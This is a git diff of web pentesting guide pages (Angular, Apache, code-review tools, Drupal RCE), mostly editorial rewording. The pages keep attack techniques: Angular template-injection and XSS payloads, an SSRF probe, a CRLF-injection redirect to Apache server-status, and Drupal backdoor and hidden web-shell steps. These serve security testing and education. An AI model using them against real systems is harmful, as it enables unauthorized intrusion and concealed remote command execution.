   - **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
   - **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
   - **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
   - [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
   - On several occasions, you will need to **understand the regular expressions** used. This will be useful: [https://regex101.com/](https://regex101.com) or [https://pythonium.net/regex](https://pythonium.net/regex)
-- You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.
+- Monitor files where forms were detected; a parameter change or the appearance of a new form may indicate new, potentially vulnerable functionality.
 
 **403 Forbidden/Basic Authentication/401 Unauthorized (bypass)**
 
@@ -330,7 +329,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
 
 **502 Proxy Error**
 
-If any page **responds** with that **code**, it's probably a **bad configured proxy**. **If you send a HTTP request like: `GET https://google.com HTTP/1.1`** (with the host header and other common headers), the **proxy** will try to **access** _**google.com**_ **and you will have found a** SSRF.
+A `502` response may indicate a misconfigured reverse proxy. Test whether it improperly accepts an absolute-form request target such as `GET https://google.com HTTP/1.1`; if it fetches the supplied host, investigate the behavior as potential SSRF.
 
 **NTLM Authentication - Info disclosure**
 

--- a/src/network-services-pentesting/pentesting-web/angular.md
+++ b/src/network-services-pentesting/pentesting-web/angular.md
@@ -16,13 +16,13 @@ Checklist [from here](https://lsgeurope.com/post/angular-security-checklist).<su
 
 ## What is Angular
 
-Angular is a **powerful** and **open-source** front-end framework maintained by **Google**. It uses **TypeScript** to enhance code readability and debugging. With strong security mechanisms, Angular prevents common client-side vulnerabilities like **XSS** and **open redirects**. It can be used on the **server-side** too, making security considerations important from **both angles**.<sup>[[1]](#references)</sup>
+Angular is a **powerful**, **open-source** front-end framework maintained by **Google**. It uses **TypeScript** to improve code readability and debugging. Angular's template sanitization reduces common client-side vulnerabilities such as **XSS**, but it does not prevent application-logic flaws such as **open redirects**. Angular can also render on the **server side**, so both client- and server-side trust boundaries require review.<sup>[[1]](#references)</sup>
 
 ## Framework architecture
 
 In order to better understand the Angular basics, let’s go through its essential concepts.
 
-Common Angular project usually looks like:<sup>[[6]](#references)</sup>
+A common Angular project has the following structure:<sup>[[6]](#references)</sup>
 
 ```bash
 my-workspace/
@@ -47,13 +47,13 @@ According to the documentation, every Angular application has at least one compo
 
 Angular NgModules declare a compilation context for a set of components that is dedicated to an application domain, a workflow, or a closely related set of capabilities. Every Angular application has a root module, conventionally named `AppModule`, which provides the bootstrap mechanism that launches the application. An application typically contains many functional modules. The `AppModule` is defined in the `app.module.ts` file.
 
-The Angular `Router` NgModule provides a service that lets you define a navigation path among the different application states and view hierarchies in your application. The `RouterModule`is defined in the `app-routing.module.ts` file.
+The Angular `Router` NgModule provides a service for defining navigation paths among application states and view hierarchies. `RouterModule` is configured in `app-routing.module.ts`.
 
 For data or logic that isn't associated with a specific view, and that you want to share across components, you create a service class. A service class definition is immediately preceded by the `@Injectable()` decorator. The decorator provides the metadata that allows other providers to be injected as dependencies into your class. Dependency injection (DI) lets you keep your component classes lean and efficient. They don't fetch data from the server, validate user input, or log directly to the console; they delegate such tasks to services.<sup>[[2]](#references)[[7]](#references)</sup>
 
 ## Sourcemap configuration
 
-Angular framework translates TypeScript files into JavaScript code by following `tsconfig.json` options and then builds a project with `angular.json` configuration. Looking at `angular.json` file, we observed an option to enable or disable a sourcemap. According to the Angular documentation, the default configuration has a sourcemap file enabled for scripts and is not hidden by default:<sup>[[2]](#references)[[8]](#references)</sup>
+Angular compiles TypeScript into JavaScript according to `tsconfig.json` and builds the project according to `angular.json`. The `sourceMap` option enables or disables source maps and provides separate controls for scripts, styles, vendor code, and hidden map references.<sup>[[2]](#references)[[8]](#references)</sup>
 
 ```json
 "sourceMap": {
@@ -64,9 +64,9 @@ Angular framework translates TypeScript files into JavaScript code by following 
 }
 ```
 
-Generally, sourcemap files are utilized for debugging purposes as they map generated files to their original files. Therefore, it is not recommended to use them in a production environment. If sourcemaps are enabled, it improves the readability and aids in file analysis by replicating the original state of the Angular project. However, if they are disabled, a reviewer can still analyze a compiled JavaScript file manually by searching for anti-security patterns.<sup>[[2]](#references)</sup>
+Source maps support debugging by mapping generated files back to their original sources. Public production maps can disclose otherwise hidden source and make analysis easier. If maps are unavailable, a reviewer can still inspect the compiled JavaScript for insecure patterns.<sup>[[2]](#references)</sup>
 
-Furthemore, a compiled JavaScript file with an Angular project can be found in the browser developer tools → Sources (or Debugger and Sources) → \[id].main.js. Depending on the enabled options, this file may contain the following row in the end `//# sourceMappingURL=[id].main.js.map` or it may not, if the **hidden** option is set to **true**. Nonetheless, if the sourcemap is disabled for **scripts**, testing becomes more complex, and we cannot obtain the file. In addition, sourcemap can be enabled during project build like `ng build --source-map`.<sup>[[2]](#references)</sup>
+The compiled Angular JavaScript is available in browser developer tools under Sources (or Debugger), commonly as `[id].main.js`. It may end with `//# sourceMappingURL=[id].main.js.map`; setting **`hidden`** to **`true`** omits that pointer but can still generate a map for private error-reporting workflows. Disabling script source maps prevents retrieval of the map, not the compiled JavaScript. Source maps can also be enabled during a build with `ng build --source-map`.<sup>[[2]](#references)</sup>
 
 ## Data binding
 
@@ -129,9 +129,9 @@ There are 6 types of `SecurityContext` :<sup>[[2]](#references)[[10]](#reference
 
 ### Bypass Security Trust methods
 
-The Angular introduces a list of methods to bypass its default sanitization process and to indicate that a value can be used safely in a specific context, as in the following five examples:<sup>[[3]](#references)</sup>
+Angular provides methods that bypass its default sanitization and mark a value as trusted in a specific context, as shown in the following five examples:<sup>[[3]](#references)</sup>
 
-1.  `bypassSecurityTrustUrl` is used to indicate the given value is a safe style URL:
+1.  `bypassSecurityTrustUrl` marks the given value as a trusted URL:
 
     ```jsx
     //app.component.ts
@@ -153,7 +153,7 @@ The Angular introduces a list of methods to bypass its default sanitization proc
     <iframe [src]="trustedResourceUrl"></iframe>
 
     //result
-    <img _ngcontent-nre-c12="" src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_light_color_272x92dp.png">
+    <iframe _ngcontent-nre-c12="" src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_light_color_272x92dp.png"></iframe>
     ```
 3.  `bypassSecurityTrustHtml` is used to indicate the given value is safe HTML. Note that inserting `script` elements into the DOM tree in this way will not cause them to execute the enclosed JavaScript code, because of how these elements are added to the DOM tree.
 
@@ -168,7 +168,7 @@ The Angular introduces a list of methods to bypass its default sanitization proc
     <h1>html tag</h1>
     <svg onclick="alert('bypassSecurityTrustHtml')" style="display:block">blah</svg>
     ```
-4.  `bypassSecurityTrustScript` is used to indicate the given value is safe JavaScript. However, we found its behavior to be unpredictable, because we couldn’t to execute JS code in templates using this method.
+4.  `bypassSecurityTrustScript` marks the given value as trusted JavaScript. It does not make a `<script>` element inserted through `innerHTML` execute; browser DOM insertion semantics still apply.
 
     ```jsx
     //app.component.ts
@@ -197,7 +197,7 @@ Angular provides a `sanitize` method to sanitize data before displaying it in vi
 
 ### HTML injection
 
-This vulnerability occurs when user input is bound to any of the three properties: `innerHTML`, `outerHTML`, or `iframe` `srcdoc`. While binding to these attributes interprets HTML as it is, the input is sanitized using `SecurityContext.HTML`. Thus, HTML injection is possible, but cross-site scripting (XSS) is not.<sup>[[3]](#references)</sup>
+This vulnerability occurs when user input is bound to `innerHTML`, `outerHTML`, or an iframe's `srcdoc`. Angular interprets the value as HTML and sanitizes it with `SecurityContext.HTML`. Benign HTML injection can therefore remain visible while known executable constructs are removed; XSS becomes possible when sanitization is bypassed, an unsafe sink is used, or a sanitizer discrepancy is found.<sup>[[3]](#references)</sup>
 
 Example of using `innerHTML`:
 
@@ -226,7 +226,7 @@ The result is `<div><h1>test</h1></div>`.
 
 Angular leverages templates to construct pages dynamically. The approach entails enclosing template expressions for Angular to evaluate within double curly brackets (`{{}}`). In this way, the framework offers additional functionality. For instance, a template such as `{{1+1}}` would display as 2.
 
-Typically, Angular escapes user input that can be confused with template expressions (e.g., characters such as \`< > ' " \`\`). It means that additional steps are required to circumvent this restriction, such as utilizing functions that generate JavaScript string objects to avoid using blacklisted characters. However, to achieve this, we must consider the Angular context, its properties, and variables. Therefore, a template injection attack may appear as follows:
+Typically, Angular escapes user input that could be interpreted as markup or template syntax (for example, characters such as \`< > ' " \`\`). Exploitation may therefore require bypassing these restrictions, such as by using functions that construct JavaScript strings without blacklisted characters. The exact payload depends on the available Angular context, properties, and variables. A template-injection payload may look like this:
 
 ```jsx
 //app.component.ts
@@ -237,7 +237,7 @@ const _userInput = '{{constructor.constructor(\'alert(1)\'()}}'
 })
 ```
 
-As shown above: `constructor`refers to the scope of the Object `constructor` property, enabling us to invoke the String constructor and execute an arbitrary code.<sup>[[3]](#references)</sup>
+As shown above, `constructor` refers to the object's `constructor` property and may enable arbitrary code execution when attacker input is concatenated into a template that the application compiles at runtime. Normal interpolation treats the same input as data and does not compile it as a new template.<sup>[[3]](#references)</sup>
 
 #### Server-Side Rendering (SSR)
 
@@ -387,7 +387,7 @@ During our research, we also examined the behavior of other `Renderer2` methods,
 
 #### jQuery
 
-jQuery is a fast, small, and feature-rich JavaScript library that can be used in the Angular project to help with manipulation the HTML DOM objects. However, as it is known, this library’s methods may be exploited to achieve an XSS vulnerability. In order to discuss how some vulnerable jQuery methods can be exploited in Angular projects, we added this subsection.<sup>[[4]](#references)[[18]](#references)</sup>
+jQuery is a JavaScript library that may be used alongside Angular to manipulate DOM objects. Methods that accept HTML strings can introduce XSS when passed untrusted input, so the following patterns remain relevant in Angular projects that also depend on jQuery.<sup>[[4]](#references)[[18]](#references)</sup>
 
 *   The `html()` method gets the HTML contents of the first element in the set of matched elements or sets the HTML contents of every matched element. However, by design, any jQuery constructor or method that accepts an HTML string can potentially execute code. This can occur by injection of `<script>` tags or use of HTML attributes that execute code as shown in the example.<sup>[[4]](#references)</sup>
 

--- a/src/network-services-pentesting/pentesting-web/apache.md
+++ b/src/network-services-pentesting/pentesting-web/apache.md
@@ -4,7 +4,7 @@
 
 ## Executable PHP extensions
 
-Check which extensions is executing the Apache server. To search them you can execute:
+Check which modules and handlers the Apache server has enabled. Run:
 
 ```bash
  grep -R -B1 "httpd-php" /etc/apache2
@@ -87,7 +87,7 @@ Notes and tips:
 
 ## Confusion Attack <a href="#a-whole-new-attack-confusion-attack" id="a-whole-new-attack-confusion-attack"></a>
 
-These types of attacks has been introduced and documented [**by Orange in this blog post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) and the following is a summary. The "confusion" attack basically abuses how the tens of modules that work together creating a Apache don't work perfectly synchronised and making some of them modify some unexpected data can cause a vulnerability in a later module.<sup>[[1]](#references)</sup>
+Orange introduced and documented these attack classes in [**this research post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1); the following is a summary. Apache modules process and mutate the same request record in stages. Semantic disagreement between modules can cause an early module to place unexpected data in a field that a later module interprets as a path, handler, or URL.<sup>[[1]](#references)</sup>
 
 ### Filename Confusion
 
@@ -151,7 +151,7 @@ DocumentRoot /var/www/html
 RewriteRule  ^/html/(.*)$   /$1.html
 ```
 
-A fun fact about Apache is that the previous rewrite will try to access the file from both the documentRoot and from root. So, a request to `https://server/abouth.html` will check for the file in `/var/www/html/about.html` and `/about.html` in the file system. Which basically can be abused to access files in the file system.
+The preceding rewrite can make Apache test the path relative to both the `DocumentRoot` and the filesystem root. For example, a request to `https://server/abouth.html` may check `/var/www/html/about.html` and `/about.html`, creating a filesystem-access primitive when other authorization conditions also permit it.
 
 #### **Server-Side Source Code Disclosure**
 
@@ -226,7 +226,7 @@ Therefore, it would be possible to **abuse files located inside `/usr/share` in 
 
 **Local Gadget to RCE**
 
-- Opportunities for **Remote Code Execution (RCE)** are vast, with vulnerable installations like an outdated **PHPUnit** or **phpLiteAdmin**. These can be exploited to execute arbitrary code, showcasing the extensive potential of local gadgets manipulation.
+- Outdated local applications such as **PHPUnit** or **phpLiteAdmin** can provide **remote code execution (RCE)** gadgets when exposed through a file-read or handler-confusion primitive.
 
 #### **Jailbreak from Local Gadgets**
 
@@ -248,22 +248,21 @@ Moreover, in the Apache HTTP Server (`server/config.c#L420`), if `r->handler` is
 
 #### **Overwrite Handler to Disclose PHP Source Code**
 
-In [**this talk**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf), was presented a vulnerability where an incorrect `Content-Length` sent by a client can cause Apache to mistakenly **return the PHP source code**. This was because an error handling issue with ModSecurity and the Apache Portable Runtime (APR), where a double response leads to overwriting `r->content_type` to `text/html`.<sup>[[9]](#references)</sup>\
-Because ModSecurity doesn't properly handle return values, it would return the PHP code and won't interpret it.<sup>[[9]](#references)</sup>
+This [**talk**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf) presented a vulnerability in which an incorrect client `Content-Length` could make Apache **return PHP source code**. Error handling between ModSecurity and the Apache Portable Runtime (APR) produced a double response that overwrote `r->content_type` with `text/html`.<sup>[[9]](#references)</sup>\
+Because ModSecurity did not handle the return values correctly, Apache returned the PHP source instead of passing it to the PHP handler.<sup>[[9]](#references)</sup>
 
-#### **Overwrite Handler to XXXX**
-
-TODO: Orange hasn't disclose this vulnerability yet
+> [!NOTE]
+> The original research initially marked this issue as undisclosed. Consult Apache's current security advisories before testing version-specific behavior.
 
 ### **Invoke Arbitrary Handlers**
 
-If an attacker is able to control the **`Content-Type`** header in a server response he is going to be able to **invoke arbitrary module handlers**. However, by the point the attacker controls this, most of the process of the request will be done. However, it's possible to **restart the request process abusing the `Location` header** because if the **r**eturned `Status` is 200 and the `Location` header starts with a `/`, the response is treated as a Server-Side Redirection and should be processed
+If an attacker controls the **`Content-Type`** header in a server response, they may be able to **invoke arbitrary module handlers**. Although most request processing has finished by then, a local redirect can restart processing: when a CGI response uses a local-path `Location` value, Apache internally reprocesses the specified path.
 
-According to [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (specification about CGI) in [Section 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) defines a Local Redirect Response behavior:<sup>[[11]](#references)[[12]](#references)</sup>
+[RFC 3875, section 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) defines CGI local-redirect response behavior:<sup>[[11]](#references)</sup>
 
 > The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.
 
-Therefore, to perform this attack is needed one of the following vulns:
+This attack therefore requires one of the following vulnerabilities:
 
 - CRLF Injection in the CGI response headers
 - SSRF with complete control of the response headers
@@ -279,7 +278,7 @@ For example `/server-status` should only be accessible locally:
 </Location>
 ```
 
-It's possible to access it setting the `Content-Type` to `server-status` and the Location header starting with `/`
+It may be possible to reach it by setting `Content-Type` to `server-status` and returning a `Location` header that begins with `/`.
 
 ```
 http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
@@ -434,7 +433,6 @@ If you find `AddType` instead of `SetHandler` / `AddHandler`, compare direct req
 - [8] [Apache RewriteRule Flags (`UnsafeAllow3F`, `UnsafePrefixStat`)](https://httpd.apache.org/docs/2.4/rewrite/flags.html)
 - [9] [Apache 0day bug, which still nobody knows of, and which was fixed accidentally (Max Dmitriev, ZeroNights 2021)](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf)
 - [10] [Docker PHP LFI Summary (Phith0n)](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp)
-- [11] [datatracker.ietf.org - RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875)
-- [12] [datatracker.ietf.org - Section 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2)
+- [11] [RFC 3875 section 6.2.2 – Local Redirect Response](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/code-review-tools.md
+++ b/src/network-services-pentesting/pentesting-web/code-review-tools.md
@@ -1,8 +1,8 @@
-# Source code Review / SAST Tools
+# Source Code Review / SAST Tools
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Guidance and & Lists of tools
+## Guidance and tool lists
 
 - [**https://owasp.org/www-community/Source_Code_Analysis_Tools**](https://owasp.org/www-community/Source_Code_Analysis_Tools)
 - [**https://github.com/analysis-tools-dev/static-analysis**](https://github.com/analysis-tools-dev/static-analysis)
@@ -96,6 +96,8 @@ There is a **free package to review PRs**.
 
 Modern **AI-assisted code review** works better as a **staged pipeline** than as a single `scan this repo` prompt. A practical pattern used by tools such as **[Visa Vulnerability Agentic Harness (VVAH)](https://github.com/visa/visa-vulnerability-agentic-harness)** is:<sup>[[4]](#references)[[5]](#references)</sup>
 
+Large defensive initiatives such as Project Glasswing also illustrate the growing use of frontier models for vulnerability discovery, but model output still needs evidence-based human validation before remediation.<sup>[[7]](#references)</sup>
+
 1. **Threat-model first**: inventory entrypoints, assets, trust boundaries, API boundaries, authz paths, taint candidates and reachable components before deep review. If available, enrich this with CMDB / known-CVE / control data so the model prioritizes realistic attack paths instead of isolated code smells.
 2. **Split research by lens**: run separate passes for access control, business logic, crypto, deserialization, IaC, batch/ETL, or language-specific sinks instead of trusting one generic review.
 3. **Require deterministic gates**: only promote a finding if it survives policy checks such as evidence completeness, majority voting, or repeated independent review.
@@ -153,7 +155,7 @@ There is an installable **free version**.
 #### Quick Start
 
 ```bash
-# Run the paltform in docker
+# Run the platform in Docker
 docker run -d --name sonarqube -e SONAR_ES_BOOTSTRAP_CHECKS_DISABLE=true -p 9000:9000 sonarqube:latest
 # Install cli tool
 brew install sonar-scanner
@@ -172,7 +174,7 @@ sonar-scanner \
 
 ### CodeQL
 
-There is an **installable free version** but according to the license you can **only use free codeQL version in Open Source projects**.
+The CodeQL CLI is available for research and open-source use; review the current GitHub CodeQL terms before using it for private or commercial analysis.
 
 #### Install
 
@@ -214,7 +216,7 @@ codeql database create /path/repo/codeql_db --source-root /path/repo
 ```
 
 > [!CAUTION]
-> This **will usually trigger and error** saying that more than one language was specified (or automatically detected). **Check the next options** to fix this!
+> This may report an error when more than one language is specified or automatically detected. Use one of the following options.
 
 - You can do this **manually indicating** the **repo** and the **language** ([list of languages](https://docs.github.com/en/code-security/codeql-cli/getting-started-with-the-codeql-cli/preparing-your-code-for-codeql-analysis#running-codeql-database-create))
 
@@ -255,7 +257,7 @@ codeql database create /tmp/codeql_db --db-cluster --source-root /path/repo
 > [!TIP]
 > Now it's finally time to analyze the code
 
-Remember that if you used several languages, **a DB per language** would have been crated in the path you specified.
+If you selected several languages, CodeQL creates **one database per language** under the specified path.
 
 ```bash
 # Default analysis
@@ -266,7 +268,7 @@ codeql database analyze /tmp/codeql_db/javascript --format=sarif-latest --output
 # Specify QL pack to use in the analysis
 codeql database analyze <database> \
     <qls pack> --sarif-category=<language> \
-    --sarif-add-baseline-file-info \ --format=<format> \
+    --sarif-add-baseline-file-info --format=<format> \
     --output=/out/file/path>
 # Example
 codeql database analyze /tmp/codeql_db \
@@ -286,9 +288,10 @@ export FINAL_MSG="Results available in: "
 
 echo "Creating DB"
 codeql database create "$REPO_PATH/codeql_db" --db-cluster --source-root "$REPO_PATH"
-for db in `ls "$REPO_PATH/codeql_db"`; do
+for db_path in "$REPO_PATH"/codeql_db/*; do
+    db=$(basename "$db_path")
     echo "Analyzing $db"
-    codeql database analyze "$REPO_PATH/codeql_db/$db" --format=sarif-latest --output="${OUTPUT_DIR_PATH}/$db).sarif"
+    codeql database analyze "$db_path" --format=sarif-latest --output="${OUTPUT_DIR_PATH}/$db.sarif"
     FINAL_MSG="$FINAL_MSG ${OUTPUT_DIR_PATH}/$db.sarif ,"
     echo ""
 done
@@ -383,7 +386,7 @@ pnpm audit
 ```bash
 # Install & run
 docker run -it -p 9090:9090 opensecurity/nodejsscan:latest
-# Got to localhost:9090
+# Go to localhost:9090
 # Upload a zip file with the code
 ```
 
@@ -434,7 +437,7 @@ https://github.com/0xd4d/dnSpy
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe test.cs
 ```
 
-## RUST
+## Rust
 
 ```bash
 # Install
@@ -507,6 +510,7 @@ https://github.com/securego/gosec
 
 - [https://prettier.io/playground/](https://prettier.io/playground/)
 - [https://beautifier.io/](https://beautifier.io/)
+- [OlaJS JavaScript Prettifier](https://olajs.com/javascript-prettifier)<sup>[[14]](#references)</sup>
 - See some of the tools mentioned in 'Deobfuscate/Unpack' below as well.
 
 #### Deobfuscate/Unpack
@@ -520,6 +524,7 @@ https://github.com/securego/gosec
    - Ensure active scan is conducted.
    - Read '[Tips/Notes](https://github.com/minamo7sen/burp-JS-Miner/wiki#tips--notes)'
    - If found, use [Maximize](https://www.npmjs.com/package/maximize) to deobfuscate.
+   - For webpack chunk structure, runtime injection, React/Vue/Angular internals, and DevTools workflows, consult the webpack reverse-engineering notes and related JavaScript research gists.<sup>[[11]](#references)[[12]](#references)</sup>
 2. Without .map files, try JSnice:
    - References: [http://jsnice.org/](http://jsnice.org/) & [https://www.npmjs.com/package/jsnice](https://www.npmjs.com/package/jsnice)
    - Tips:
@@ -532,12 +537,12 @@ https://github.com/securego/gosec
 - [https://github.com/j4k0xb/webcrack](https://github.com/j4k0xb/webcrack)
   - > Deobfuscate obfuscator.io, unminify and unpack bundled javascript
 - [https://github.com/jehna/humanify](https://github.com/jehna/humanify)
-  - > Un-minify Javascript code using ChatGPT This tool uses large language modeles (like ChatGPT & llama2) and other tools to un-minify Javascript code. Note that LLMs don't perform any structural changes – they only provide hints to rename variables and functions. The heavy lifting is done by Babel on AST level to ensure code stays 1-1 equivalent.
+  - > Un-minify JavaScript code using an LLM. The model suggests variable and function names, while Babel performs structural transformations to preserve equivalent code.
   - [https://thejunkland.com/blog/using-llms-to-reverse-javascript-minification.html](https://thejunkland.com/blog/using-llms-to-reverse-javascript-minification.html)
     - > Using LLMs to reverse JavaScript variable name minification
 
-3. Use `console.log()`;
-   - Find the return value at the end and change it to `console.log(<packerReturnVariable>);` so the deobfuscated js is printed instead of being executing.
+4. Use `console.log()`:
+   - Find the return value at the end and change it to `console.log(<packerReturnVariable>);` so the deobfuscated JavaScript is printed instead of executed.
    - Then, paste the modified (and still obfuscated) js into [https://jsconsole.com/](https://jsconsole.com/) to see the deobfuscated js logged to the console.
    - Finally, paste the deobfuscated output into [https://prettier.io/playground/](https://prettier.io/playground/) to beautify it for analysis.
    - **Note**: If you are still seeing packed (but different) js, it may be recursively packed. Repeat the process.
@@ -545,6 +550,10 @@ https://github.com/securego/gosec
 #### Tools
 
 - [https://portswigger.net/burp/documentation/desktop/tools/dom-invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)
+- Dynamic-analysis walkthrough: DAST JavaScript Dynamic Analysis.<sup>[[8]](#references)</sup>
+- Angular-specific review background: the archived “Angular for Pentesters” parts 1 and 2.<sup>[[9]](#references)[[10]](#references)</sup>
+- [CyberChef](https://cyberchef.org/) is useful for decoding, decompressing, and transforming captured bundle data.<sup>[[13]](#references)</sup>
+- [JSHint](https://jshint.com/) and its source repository provide lightweight JavaScript quality/static checks.<sup>[[15]](#references)[[16]](#references)</sup>
 
 ## References
 

--- a/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
+++ b/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
@@ -7,21 +7,21 @@
 > [!WARNING]
 > In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated." But from version 8 this module is not installed by default.
 
-1. Go to **/modules/php** and if a 403 error is returned then the **PHP filter plugin is installed and you can continue**
-   1. If not, go to `Modules` and check on the box of `PHP Filter` and then on `Save configuration`
-2. Then, to exploit it, click on `Add content` , then Select `Basic Page` or `Article` and write the **PHP backdoor**, then select `PHP` code in Text format and finally select `Preview`
-3. To trigger it, just access the newly created node:
+1. Request **`/modules/php`**. A `403` response can indicate that the PHP Filter module exists but directory listing is denied.
+   1. If necessary and authorized, open `Modules`, enable `PHP Filter`, and select `Save configuration`.
+2. Select `Add content`, choose `Basic Page` or `Article`, enter the **PHP backdoor**, choose `PHP code` as the text format, and select `Preview`.
+3. Trigger it by requesting the newly created node:
 
 ```bash
 curl http://drupal.local/node/3
 ```
 
+> [!WARNING]
+> The two module-installation techniques below apply to older or explicitly enabled administrative workflows. Current Drupal installations do not allow module installation solely through the web interface after the default installation.
+
 ## Install PHP Filter Module
 
-> [!WARNING]
-> In current versions it's no longer possible to install plugins by only having access to the web after the default installation.
-
-From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.
+From version **8 onward, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. Leveraging this functionality therefore requires installing the module.
 
 1. Download the most recent version of the module from the Drupal website.
    1. `wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz`
@@ -31,10 +31,7 @@ From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/
 
 ## Backdoored Module
 
-> [!WARNING]
-> In current versions it's no longer possible to install plugins by only having access to the web after the default installation.
-
-It was possible to **download** a **module**, add a **backdoor** to it and **install** it. For example, downloading [**Trurnstile**](https://www.drupal.org/project/turnstile) module in compressed format, creating a new PHP backdoor file inside of it, allowing the accessing of the PHP file with a `.htaccess` file:
+It was possible to **download a module**, add a **backdoor**, and **install** the modified package. For example, download the [**Turnstile**](https://www.drupal.org/project/turnstile) module as an archive, add a PHP backdoor, and use `.htaccess` to permit direct access to the PHP file:
 
 ```html
 <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / </IfModule>
@@ -48,7 +45,7 @@ And then going to **`http://drupal.local/admin/modules/install`** to install the
 
 ### Part 1 (activation of _Media_ and _Media Library_)
 
-In the _Extend_ menu (/admin/modules), you can activate what appear to be plugins already installed. By default, plugins _Media_ and _Media Library_ don’t appear to be activated, so let’s activate them.
+In the _Extend_ menu (`/admin/modules`), activate installed modules. If _Media_ and _Media Library_ are disabled, enable them.
 
 Before activation:
 
@@ -133,13 +130,13 @@ File: field.field.media.document.field_media_document.yml
 
 ```
 
-> I don’t use it in this blogpost but it is noted that it is possible to define the entry `file_directory` in an arbitrary way and that it is vulnerable to a path traversal attack (so we can go back up within the Drupal filesystem tree).
+> The original blog post does not use it, but notes that an arbitrary `file_directory` value may enable path traversal within the Drupal filesystem tree.
 
 <figure><img src="../../../images/image (6) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 ### Part 3 (leveraging feature _Add Document_) <a href="#part-3-leveraging-feature-add-document" id="part-3-leveraging-feature-add-document"></a>
 
-The last step is the simplest, and is broken down into two sub-steps. The first is to upload a file in .htaccess format to leverage the Apache directives and allow .txt files to be interpreted by the PHP engine. The second is to upload a .txt file containing our payload.
+The last step has two parts: upload an `.htaccess` file whose Apache directives make `.txt` files execute through PHP, then upload a `.txt` file containing the payload.
 
 File: .htaccess
 
@@ -163,11 +160,11 @@ File: .htaccess
 
 Why is this trick cool?
 
-Because once the Webshell (that we’ll call LICENSE.txt ) is dropped onto the Web server, we can transmit our commands via `$_COOKIE` and in the Web server logs, this will show up as a legitimate GET request to a text file.
+Once the web shell (named `LICENSE.txt`) is on the server, commands can be supplied through `$_COOKIE`; the access log then resembles a normal `GET` request for a text file.
 
 Why name our Webshell LICENSE.txt?
 
-Simply because if we take the following file, for example [core/LICENSE.txt](https://github.com/drupal/drupal/blob/11.x/core/LICENSE.txt) (which is already present in the Drupal core), we have a file of 339 lines and 17.6 KB in size, which is perfect for adding a small snippet of PHP code in the middle (since the file is big enough).
+Drupal core already contains a comparatively large [core/LICENSE.txt](https://github.com/drupal/drupal/blob/11.x/core/LICENSE.txt), so a small PHP snippet inserted into a copied license file is less conspicuous during a superficial review.
 
 <figure><img src="../../../images/image (7) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
@@ -230,11 +227,11 @@ As shown in the following screenshot, if the cookie expected by our Webshell is 
 
 <figure><img src="../../../images/image (14) (1).png" alt=""><figcaption></figcaption></figure>
 
-When the attacker sets the cookie, he can interact with the Webshell and execute any commands he wants.
+When the attacker sets the cookie, they can interact with the web shell and execute commands.
 
 <figure><img src="../../../images/image (15) (1).png" alt=""><figcaption></figcaption></figure>
 
-And as you can see in the logs, it looks like only a txt file has been requested.
+In the access logs, the request appears to target only a `.txt` file.
 
 <figure><img src="../../../images/image (16) (1).png" alt=""><figcaption></figcaption></figure>
 
@@ -269,7 +266,7 @@ Notes for testing:
 
 ## Recent contrib-module unsafe deserialization → RCE
 
-Several contrib modules fixed insecure `unserialize()` paths in late 2024. If the site is missing these updates, they give you the exploitable sink required by the core gadget chain:
+Several contributed modules fixed insecure `unserialize()` paths in late 2024. If a site is missing these updates, they may provide the exploitable sink required by the core gadget chain:
 
 - **Mailjet** (<4.0.1, CVE-2024-13296): admin-controlled data passed to `unserialize()`, enabling **PHP Object Injection → RCE** when chained with the core gadgets.<sup>[[4]](#references)</sup>
 - **Eloqua** (7.x-1.x < 1.15, CVE-2024-13297): similar unsafe `unserialize()` usage reachable by users with `access administration pages`.<sup>[[5]](#references)</sup>

--- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
